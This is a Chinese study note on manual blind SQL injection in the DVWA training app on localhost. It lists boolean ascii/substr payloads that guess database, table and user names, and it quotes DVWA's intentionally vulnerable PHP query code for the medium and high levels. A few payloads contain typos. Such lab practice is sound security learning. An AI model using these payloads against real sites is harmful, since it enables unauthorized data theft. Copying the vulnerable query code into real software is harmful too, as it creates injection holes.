学习笔记—DVWA sql盲注手工
一、dvwa 低sql盲注手工
1’and ascii(substr(database(),2,1))>'97 exists
1’and ascii(substr(database(),2,1))<'122 exists
1’and ascii(substr(database(),2,1))<'119 exists
1’and ascii(substr(database(),2,1))<'118 MISSING
1’and ascii(substr(database(),2,1))='118 exists
先判断字符类型,再判断具体字母
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1’and ascii(substr(database(),2,1))=‘118&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1 and (select count(table_name) from information_schema.tables where table_schema=database())=2&Submit=Submit#
先猜测长度,在用跟猜测数据库名一样的方法猜表名
1’ and length(substr((select table_name from information_schema.tables where table_schema=‘dvwa’ limit 0,1),1))=1 # MISSING
…
1’ and length(substr((select table_name from information_schema.tables where table_schema=‘dvwa’ limit 0,1),1))=9 # exists
得到表名长度为9
之后还是先猜字符类型,再猜具体字符
1’ and ascii(substr ((select table_name from imformation_schema.tables where table_schema=‘dvwa’ limit 0,1),1))>97
二、dvwa 中sql盲注手工
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/
?id=1 and ascill(substr((select user from users limit 0,1),4,1))=110%23
&Submit=Submit#
三、dvwa 高sql盲注手工
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
了解更多请关注下列公众号: